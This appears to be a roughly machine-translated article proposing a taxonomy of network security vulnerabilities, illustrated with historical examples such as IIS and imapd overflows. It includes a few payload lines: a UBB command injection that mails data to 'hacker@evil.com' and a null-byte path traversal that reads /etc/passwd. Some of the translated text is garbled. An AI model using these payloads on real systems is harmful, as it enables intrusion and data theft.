This article aims to summarize some things and solve the main problems encountered when attempting to construct a Vulnerability Database, that is, how to classify computer network vulnerabilities. Some of the ideas in this article are not mature, and some are not even satisfied with themselves, so as to communicate with colleagues who have in-depth research in this area and improve the work together. A computer network security vulnerability has its many attributes. I think it can be summarized in the following aspects: the possible direct threats caused by the vulnerability, the causes of the vulnerability, and the severity of the vulnerability, how the vulnerability is exploited. The following sections describe the categories of vulnerabilities.
A. direct threats to the system caused by Vulnerabilities
It can be roughly divided into the following categories. In fact, the security threats caused by a system vulnerability are far from limited to its direct possibility. If attackers gain access to general users of the system, it is very likely that he will upgrade himself to the administrator privilege by exploiting the local vulnerability:
1. remote administrator permissions
Attackers do not need to log on to the local computer with an account to directly obtain the administrator privilege of the remote system. Generally, attackers can perform attacks by executing defective system daemon processes as root. Most of the vulnerabilities are caused by buffer overflow, and a few are caused by logical defects of the daemon.
Typical vulnerabilities:
1. the AUTHENTICATE command of IMAP4rev1 v10.190 daemon imapd does not check the length when reading parameters. A well-designed AUTH command string can be constructed to overflow the imapd buffer and run the specified command, imapd runs as root to directly obtain the root permission of the machine.
2. The isapi dll of WindowsNT IIS 4.0 does not perform a proper boundary check on the input URL. If you construct an ultra-long URL, You can overflow the buffer of IIS (inetinfo.exe) and execute the specified code. Since inetinfo.exe is started as a local system, you can directly obtain the Administrator permission after overflow.
3. In the early days, the AIX 3.2 rlogind code had authentication logic defects? Cl? Cfroot can directly log on to the system as root without providing a password.
2. Local administrator permissions
When a local account can log on to the system, attackers can obtain system administrator privileges by attacking some local defective suid programs and competing conditions.
Typical vulnerabilities:
1. RedHat Linux's restore is a suid program. Its execution relies on a medium RSH environment variable. By setting the environment variable PATH, the executable program in the RSH variable can run as root to obtain the root permission of the system.
2. The Xsun program of Solaris 7 has a suid bit, which does not perform a valid boundary check on the input parameters. It can easily overflow its buffer and run the code we specified as root, to obtain the administrator privilege.
3. In Windows, attackers have the opportunity to make the Network DDE (a technology that dynamically shares data between applications on different Windows machines) the proxy executes the specified code in the security context of the local system user, so as to improve permissions and fully control the local machine.
3. Access Permissions of common users
Token Access permission, which can execute programs and access files as normal users. Attackers usually attack a daemon running as a non-root user and obtain such access permissions by means of defective cgi programs.
Typical vulnerabilities:
1. UBB is a forum program widely used in a variety of UNIX and Windows systems. It is implemented using PERL. Its versions earlier than 5.19 have input verification problems. By submitting carefully crafted form content, UBB can execute shell commands. Generally, a web server runs as a nobody, so a nobody shell can be obtained. For example, submit such data: topic = 012345.ubb mail hacker@evil.com
2. The innd 2.2.2.3 news server in RedHat Linux 6.2 has a buffer overflow vulnerability. By using a specially crafted news letter, the innd server can run our specified code as news, get a shell with the innd permission.
3. For Windows IIS 4.0-5.0, the unicodeuncode is missing. Attackers can use cmd.exe to run programs on the system with the permissions of the guest group. It is equivalent to obtaining the permissions of common users.
Iv. Permission escalation
Attackers attack some defective sgid programs locally to escalate their permissions to a non-root user. Obtaining administrator permissions can be seen as a special elevation of permissions, but they are independent of threats.
Typical vulnerabilities:
1. The RedHat Linux 6.1 man program is sgid man, which has a format bug. Through its overflow attack, attackers can obtain the User Permissions Of the man group.
2. The write Program of Solaris 7 is sgid tty, which has a buffer overflow problem. through attacks on it, attackers can obtain the user permissions of the tty group.
3. In the WindowsNT system, attackers can mount a special porfile to other users in the system, so that other users can execute malicious code, sometimes even administrators.
5. Read restricted files
Attackers exploit certain vulnerabilities to read files in the system that are not permitted. These files are usually security-related. These vulnerabilities may be caused by incorrect file setting permissions, incorrect file processing by privileged processes, and accidental dump of core to dump a portion of restricted files to the core file.
Typical vulnerabilities:
1. the ftpd of SunOS 5.5 has a vulnerability. Generally, users can cause an ftpd error and dump a globally readable core file with a shadow file segment, so that the general user can read part of the shadow content.
2. The suid program pg of SuSE 6.2 has some problems with its configuration file processing. When you link pb. conf to a privileged file, you can use pb to read the content of those files.
3. The log file of Oracle 8.0.3 Enterprise Edition for NT 4.0 is globally readable and clear. It records the connection password and may be read by attackers.
6. Remote Denial of Service
Attackers can exploit this vulnerability to launch DoS attacks on the system without logging on, causing system or related applications to crash or lose response capabilities. These vulnerabilities are usually caused by defects or incorrect settings of the system or its daemon.
1. The ip segment reorganization module of the early Linux and BSD TCP/IP stack has a defect. The attack can cause the machine to crash by sending a Special ip segment package to the system.
2. Netmeeting 3.01 in Windows2000 has a defect. By sending binary data streams to it, the server can occupy 100% of the CPU.
3. Sending a USER command with a super-long parameter to the ftp port of AnalogX Proxy Server 4.04 can cause the application to crash.
7. Local Denial of Service
Attackers can exploit this vulnerability to crash the system or application after logging on to the system. This vulnerability is mainly caused by program errors in handling unexpected situations, such as not checking whether the file exists before writing a temporary file or blindly following the link.
1. BSDi 3. x has a vulnerability that allows a local user to overwrite any of the system with some junk data, making the system unavailable easily.
2. The tmpwatch program of RedHat 6.1 has defects, which can cause many processes in the fork () system, thus making the system lose the response capability.
8. remote unauthorized File Access
By exploiting these vulnerabilities, attackers can remotely access certain system files without authorization. These vulnerabilities are mainly caused by defective cgi programs that do not properly check the legality of user input, allowing attackers to access files by constructing special input.
Typical vulnerabilities:
1. The Poll_It_SSI_v2.0.cgi vulnerability allows attackers to view all files with access permissions outside the web directory. Then, they can send the following requests to the server to see the/etc/passwd file, _ It_v2.0.cgi? Data_dir = etcpasswd % 00 "> http://www.targethost.com/pollit/Poll_It_v2.0.cgi? Data_dir = etcpasswd % 00
2. A vulnerability exists in Windows IIS 5.0. By sending a special head flag to it, you can get the asp source code instead of the asp page after the explanation is executed.
3. Windows IE has many vulnerabilities that allow malicious web pages to read and browse users' local files.
9. Password Recovery
Because of the weak password encryption method, attackers can easily analyze the export order encryption method, so that attackers can obtain the password in some way and then restore the plaintext.
Typical vulnerabilities:
1. PassWD v1.2 in Windows is used to manage various passwords in the system and store them with URLs. However, the encrypted password encryption method is very fragile. After simple analysis, the encrypted password can be used to restore the plaintext.
2. Pcanywhere 9.0 uses a very fragile encryption method to encrypt passwords in transmission. As long as you are familiar with the data in transmission, it is easy to decode the plaintext password.
3. Browsegate is a proxy _ blank "> firewall in Windows. Its 2.80.2 version stores the encrypted password in the configuration file and the configuration file is readable to all users, however, the encryption method is extremely fragile and can easily decode the plaintext.
10. Deception
Attackers can exploit this vulnerability to cheat the target system. This is usually because of some defects in system implementation.
Typical vulnerabilities:
Windows IE has a vulnerability that allows a malicious network to insert content in a window of another wind station, thus deceiving users into sensitive data.
The TCP/IP stack under Linux kernel 2.0.35 has a vulnerability, which can make it easy for attackers to perform ip address spoofing.
11. Server Information Leakage
Attackers can exploit this vulnerability to collect useful information for further attacks. This type of vulnerability is generated mainly because the system program has a defect and is generally incorrectly handled.
Typical vulnerabilities:
1. A vulnerability exists in Windows IIS 3.0-5.0 when a request to the system does not exist. idq ,. in The idq file, The machine may return an error message, which exposes The IIS installation directory information, such as requesting http://www.microsoft.com/anything.ida, and The server will return response: The IDQ